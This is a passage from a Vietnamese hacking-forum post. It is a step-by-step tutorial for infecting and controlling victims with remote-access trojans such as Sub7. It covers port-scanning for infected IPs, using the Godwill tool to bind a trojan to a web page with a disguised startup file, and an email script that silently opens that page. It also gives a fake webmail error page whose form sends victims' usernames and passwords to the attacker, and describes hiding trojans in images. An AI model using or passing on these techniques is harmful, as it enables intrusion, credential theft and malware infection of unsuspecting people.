Một số loại trojan mới đây cho phép bạn sau khi chạy chương trình điều khiển (file client.exe)chỉ cần nhấn nút connect là có thể biết đuợc số IP của nạn nhân đã bị nhiễm trojan thông qua việc nó tự động scan cổng măc định của trojan và từ các số Ip đó ,ta sẽ chọn máy của nạn nhân có số IP đó để kết nối vào và điều khiển (Nhắc lại về số IP:nó giống như 1 thẻ chứng minh nhân dân của bạn khi bạn lên mạng .Mỗi máy lên mạng đều có số IP riêng biệt khôgn ai giống ai.Khi bạn làm bất cứ 1 đièu gi đó phạm pháp chẳng hạn đột nhập vào hệ thống máy chủ ..nhưng lại không có kỹ năng xoá dấu chân ...thì người ta sẽ hoàn toàn có thể biết được để đề phòng hoặc thậm chí truy ra số IP của bạn và từ đó có thể biết được là vào thời điểm đó ,bạn tức là người sở hữu số Ip đó có số điện thoại là bao nhiêu đó đã làm việc phạm pháp.Đương nhiên có nhiều cách để che dấu số IP khi lên mạng bằng cách dùng proxy(đây chỉ là cách đơn giản và thô sơ ..Các bạn có thể tham khảo thêm ở http://www.vtv4online.net/ hoăc http://caodanghieu.dk3.com/) .Thế còn những loại trojan không thể cho ta tính năng scan cổng đó thì làm sao để ta biết đuợc IP của những nạn nhân bị nhiễm.Đuong nhiên chúng ta phải thực hiện thủ công.Trước tiên phải xác định số IP của những nạn nhân bị nhiễm chứ gì?.Bạn nên kiếm 1 công cụ scan cổng (scan port).các công cụ này các bạn có thể tìm thấy trên http://caodanghieu.dk3.com/.Chẳng hạn như trojan của bạn mở cổng 911 thì bạn có thể cho chương trình scan port scan từ 900 cho đến 920.Bạn điền vào khung start point(điểm khởi đầu):900 và stop point (điểm kết thúc):920.Thông thưòng thì chương trình scan cổng nào cung thiết kế khung chương trình như thế tức là bao gồm start point(điểm khởi đầu) và stop point (điểm kết thúc).Bạn cứ nhập vào và scan.Nói thế chắc các bạn đã hiểu.Ngay lập tức nếu đến cổng nào đó có số IP nào bị nhễm thì nó se ghi trong danh sách là : Tại cổng 911 (số cổng mà các trojan đã mở) ,có số IP này 203.162.23.23 bị nhiễm (đây là số Ip của nạn nhân bị nhiẽm).Chú ý là các con số911 hay 203.162.23.23 chỉ là các con số mà tôi đua ra để ví dụ .Các con số này tuỳ thuộc vào cổng mà trojan đã mở và số IP bi nhiễm.Sau khi đã có số IP rồi của nạn nhân bị nhiễm trojan mở cổng đó rồi ,bạn bắt đầu dùng con điều khiển(client.exe),bạn copy số IP đó vào ô nhập IP rồi nhấn connect.Sau khi connect xong là bạn có thể tha hồ điều khiển rồi đấy.Bạn có thể chọn các tính năng sẵn có trên chương trình điều khiển để quậy .
B.Ví dụ điều khiển nạn nhân bị nhiễm SUB7 mọt loại trojan điều khiển rất hay:
Bạn có thê down trojan này trên web http://caodanghieu.dk3.com/ trong phần hack .Sau khi gửi cho nạn nhân file server.exe.Bạn chạy chương trình điều khiển client.exe .Phiên bản SUb7 ,à tôi nói tới đây mở cổng là 1243 vì thế bạn nên scan trong phạm vi cổng này tìm và lấy số IP của nạn nhân bị nhiễm trojan mở cổng này.Bạn kiếm 1 chương trình scan cổng bất kỳ và scan cổng trong phạm vi là 1243 ,bạn sẽ tìm ra đuợc số IP bị nhiễm trojan mở cổng 1243.Có đuợc số IP rồi bạn copy nó vào ô nhập IP rồi nhấn nút connect.Sau khi connect xong ,bạn đã có thể bắt đầu điều khiển rồi đấy.Tôi chỉ bày tới đây.Bởi vì mọi việc bây giờ quá đơn giản ,nếu biết tiếng anh bạn sẽ biết các nút tính năng trên chương tình có thể cho ta điều khiển cái gì ,làm cái gì ....chẳng hạn như chat với nạn nhân,khoá bàn phím ,lấy thông tin từ keylog...Các bạn có thể xem hình minh hoạ để nắm rõ các bước cơ bản để connect và điều khiển.
Đến đây các bạn thấy sao,đã hiểu đuợc phần nào chưa.Tôi chắc qua cách trình bày quá dễ hiểu và mạch lạc như thế này các bạn cũng có thể tự tin mà thực hành được rồi đấy.
Sau đây sẽ là các thủ thuật để các bạn dụ nạn nhân mở file trojan hoặc cho trojan chạy trên máy nạn nhân trong khi nạn nhân không hề hay biết gì.
II/ .Các thủ thuật để các bạn dụ nạn nhân mở file trojan hoặc cho trojan chạy trên máy nạn nhân trong khi nạn nhân không hề hay biết gì ( thế mới ác chứ)
Điều cần nhất trong quá trình này là bạn phải có 1 trang web để upload trang web có đính kèm trojan lên đó .Sau đó sẽ gửi mail cho nạn nhân ,trong email sẽ có 1 đoạn mã để mở trang web có đính kèm trojan đó.Trang web sẽ đuợc mở âm thầm mà nạn nhân không hề hay biết trừ khi nạn nhân cài norton antivirus 2002 ,tường lửa..hoặc disable tính năng activex trong internet option.
Còn nếu không thì chỉ còn cách gởi trojan cho nạn nhân và chờ nạn nhân kích hoạt nó.Nhưng cũng đừng bi quan ,chúng ta cung vẫn có thể đính kèm trojan vào 1 file ảnh và khi nạn nhân xem ảnh thì trojan sẽ chạy thôi.Lo gì.
****************************************************************************************************
**************************
Trường hợp thứ nhất : Nếu bạn có thể upload 1 trang web lên đâu đó.
Bạn có thể tham khảo các bài vè tạo 1 trang web trên mạng trên http://www.viet-online.net/.Sau đó đính kèm trojan vào web rồi gửi mail đến cho nạn nhân .
Để đính kèm trojan vào web ,trước tiên bạn cần tạo 1 trang web,nếu bạn là người chưa biết gì về web thì có 2 cách đon giản để bạn tạo trang web là như sau.Thứ nhất,bạn save 1 trang web nào đó trên m?ng .Thứ 2 ,bạn dùng world97 tạo 1 văn bản mới ,bạn tha hồ vẽ vời vào trong đó(đừng nói là bạn không biết dùng world đó nha),xong ,bạn lưu lại dưới dạng html(hoặc htm).Như vậy là bạn đã có 1 trang web.
Sau đó bạn cần 1 công cụ godwill đề đính kèm trojan vào trang web vừa tạo (bạn có thể down ở http://caodanghieu.dk3.com/ trong phần công cụ).
Cách sử dụng godwill như sau
Chạy chương trình --> chọn Enter --> chọn nút "html" trong các nút ở cuối cửa sổ Godwill --> chọn "general options" (hình 1).
+enter .exe file: path tới file trojan (k2ps.exe).
+enter .html file: trang web mà mình đã thiết kế.
+enter output: ten trang web có đính mã Godmessage (VD để là xxx.html, sau khi hoàn tất các công đoạn sẽ xuất hiện file xxx.html trong thư mục Godwill, trang web này đã đựơc gán trojan, không được mở).
+các tùy chọn khác là để thông báo bằng đường ICQ... nếu là newbie thì khỏi cần để ý.
+browser redirection: sau khi đọc trang web victim sẽ được chuyển về là http://www.yahoo.com/ (tùy bạn).
+HTA filename: sau khi xem web, trong start-up của victim sẽ xuất hiện 1 file .HTA ,đặt tên file đó nghe sao cho "microsoft" một chút để khỏi bị nghi ngờ (VD: msreg)
+sau đó chọn done.
+phần "advanced option" không cần để ý cũng được.
+muốn save config hay không là tùy ý, nhấn nút có chữ "GEN", trang web có gán trojan sẽ được tạo ra.
Bạn lưu trang web này lại và upload lên đâu đó trên các host .Xin lõi vì tôi không thể bày các bạn cụ thể về vấn đề này trong phạm vi bài viêt này.Nếu bạn muốn biêt thêm chi tiết về cách làm web và upload web xin hãy lên: http://www.viet-online.net/
Nếu như con trojan của bạn lớn hơn 34kb thì lúc dó bạn không thể đính kèm nó vào web được.Cách đơn giản để giải quyết vấn đề này là bạn up con trojan có kích thuớc lên dâu dó trên web hay ở đâu cũng dược miễn là bạn như dịa chỉ của file trojan dó(duong nhiên la file exe).Sau dó bạn dùng con chuong trình này để có thể tạo ra con trojan có kích thuớc 5kb có khả năng download file trojan lớn ở trên web về máy nạn nhân và chạy nó.Sau đó đính kèm con trojan có kích thước nhỏ này vào web như đã bày ở trên.Okie.một việc thật là đơn giản.Cách sử dụng nó có lẽ các bạn nên tự tìm hiểu lấy vì trong phạm vi bài viết về trojan này tôi không thể bày cặn kẽ về mọi vấn đề đuợc.
Okie.Sau khi đã có dược 1 trang web trên mạng .Bạn nên ghi nhớ địa chỉ của trang web có dính kèm trojan đó.
A.Neu nhu Victim dung OUTLOOK EXPRESS de nhan thu :
Bây giờ là cách chèn đoạn mã script vào source của mail để khi nạn nhân mở mail ,trang web có đính kèm trojan của ta sẽ âm thầm mở.
Nếu bạn gởi mail bằng OUTLOOK EXPRESS thì bạn bắt đầu chọn file kế đến chọn new kế đến chọn mailmessage
sau khi hiện ra khung gửi thu bạn chọn nút view_source edit.Tab Source dã hiện ra rồi ! Click ...
Nhìn qua , ta thấy dó là source của thu ( thường bằng HTML )
Tìm thẻ Body , sữa nó thành như dòng
<body onLoad="autoweb()">
Sau đó chèn đoạn mã sau vào
kế tiếp
<script LANGUAGE="JavaScript">
function autoweb()
{{window.open("http://www.yourweb.com","","width=1,height=1,resizable=yes,top=10000,bottom=10000")}}
</SCRIPT>
Như vậy chỉ cần victim xem mail của bạn bằng OUTLOOK EXPRESS thì trang web có gán trojan (ở đây là <http://www.yourweb.com)/> sẽ âm thầm được mở (nếu không chú ý thì victim sẽ không phát hiện vì trang web được mở rất kín).
http://www.yourweb.com chính là địa chỉ của trang web bị nhiễm trojan mà bạn đã tạo ra lúc đầu đấy.
B.Nếu nạn nhân dùng Webmail để nhận thư:
1.Đầu tiên bạn đăng ký 1 địa chỉ email ở hotmail hay bất cứ webmail nào khác.Sau đó dùng địa chỉ email này để đăng ký 1 host (xem thêm về cách đăng ký host) ở www.trypod.com hay bất cứ host nào khác hỗ trợ CGI.
2.Việc cần làm tiếp theo là bạn phải làm 1 trang web giả mạo trang webmail của nạn nhân.Tốt nhất là phải ;àm 1 trang báo lỗi giả mạo để nạn nhân khỏi nghi ngờ.Có 2 cách để có được 2 loại trang báo lỗi
Cách1:Bạn login vào dưới 1 cái tên nào đó bạn bịa ra và password cũng do bạn bịa.Nó sẽ hiện ra trang báo lỗi rằng bạn đã nhập sai pass..Bạn lưu trang lỗi này lại cùng với tất cả các hình ảnh.
Cách2:Bạn tạo 1 địa chỉ email trên webmail mà nạn nhân đang sử dụng(yahoo,hotmail...)Sau đó bạn login vào và đợi khoảng hơn 1 tiếng đồng hồ và nhấn vào nút SOẠN THƯ(compose,write mesage)
bạn sẽ nhận được trang báo lỗi với các lỗi như:Time out..Bạn cũng lưư trang lỗi này lại với tất cả hình ảnh của nó.
3.Bạn dùng NOTEPAD hay bất cứ chương trình soạn thảo văn bản nào để biên tập lại file web lỗi mà bạn đã lưu về
Bước 1.Tìm đến dòng có thẻ: <head>...</head> và thay nó bằng <noscript><head></head></noscript> để ngăn cái popup quảng cáo của TRYPOD mục đích là để làm cho nạn nhân khỏi nghi ngờ.
Bước 2.Tìm đến dòng: <form method=post action="xxxxxxxxxxx"> và thay nó thành <form action="http://www.free-cgi.ch/cgi-bin/formmail-a.cgi" method="get"> <input type="hidden" name="redirect" value="http://xxx.xx"><input type="hidden" name="recipient" value= "your@email">
your@email chính là địa chỉ emaill mà bạn đã đăng ký lúc đầu và đã dùng nó để
đăng ký host .
Bước 3:Upload file html đó lên host Trypod
Bước 4:Gửi cho nạn nhân một fake email định dạng html .Trong đó bạn điền đoạn code này:<meta http-equiv="refresh" content="1;url=Địa chỉ trang web lỗi của bạn"> vào trong thẻ <head></head>
Bây giờ bạn chỉ can ngồi chờ nạn nhân mở mail và khi nạn nhân mở mail trang webmail sẽ refresh thành trang lỗi của bạn.Khi đó nếu nạn nhân login lại thì đòng nghĩa với việc 1 email chứa thông tin của nạn nhân(user và pass) sẽ được gửi đến email của bạn(email lúc đầu mà bạn đã đăng ký).
Trường hợp thứ hai:Nếu bạn không thể upload 1 trang web lên âu đó và thậm chí cũng không có khả năng tạo 1 trang web thì có lẽ chỉ còn 2 cách sau
.Gửi file trojan trực tiếp cho nạn nhân và hy vọng nạn nhân sẽ ngu ngốc đến nỗi sẽ kích hoạt nó.
.Cách thứ 2 là đính kèm trojan vào 1 file ảnh.Chương trình này hiện có trên http://caodanghieu.dk3.com trong phần công cu.Sau đó gửi file ảnh đã dính kèm trojan này cho nạn nhân .Nếu là file ảnh thì có lẽ nạn nhân sẽ mở mà không ngần ngại đâu.
III/. Tài nguyên trên mạng về trojan
Hiện có rất nhiều địa chỉ cung cấp cho các bạn trojan cũng như các thông tin về nó.
.Những chương trình mà tôi nói tới trong bài này hiện đều có trên http://caodanghieu.dk3.com/.
.Ngoài ra các bạn có thể tìm thêm các trojan khác ở các trang web nổi tiếng sau:
http://megasecurity.org/,http://www.tlsecu....blackcode.com/.
.Nếu bạn muốn tìm 1 con trojan nào hay công cụ nào ,bạn cung có thẻ tìm nó trên http://www.google.com/ bằng cách gõ tên chương trình ,trojan vào khung tìm kiếm rồi nhấn Enter.
Khang Joker- Đế Vương - Khang Gia
- Tổng số bài gửi : 17
Like : 1
Join date : 15/07/2015
Age : 24
Đến từ : Việt Nam
Similar topics» Hướng dẫn gắn Trojan
» Kĩ thuật gắn Trojan vào file html
» Tạo Virus đơn giản bằng notepad
» Viết Virus bằng pascal
» Hướng dẫn ae cách ngắt mạng quán net.troll max net :3
» Kĩ thuật gắn Trojan vào file html
» Tạo Virus đơn giản bằng notepad
» Viết Virus bằng pascal
» Hướng dẫn ae cách ngắt mạng quán net.troll max net :3
Trang 1 trong tổng số 1 trang
Permissions in this forum:
Bạn không có quyền trả lời bài viết|
|
|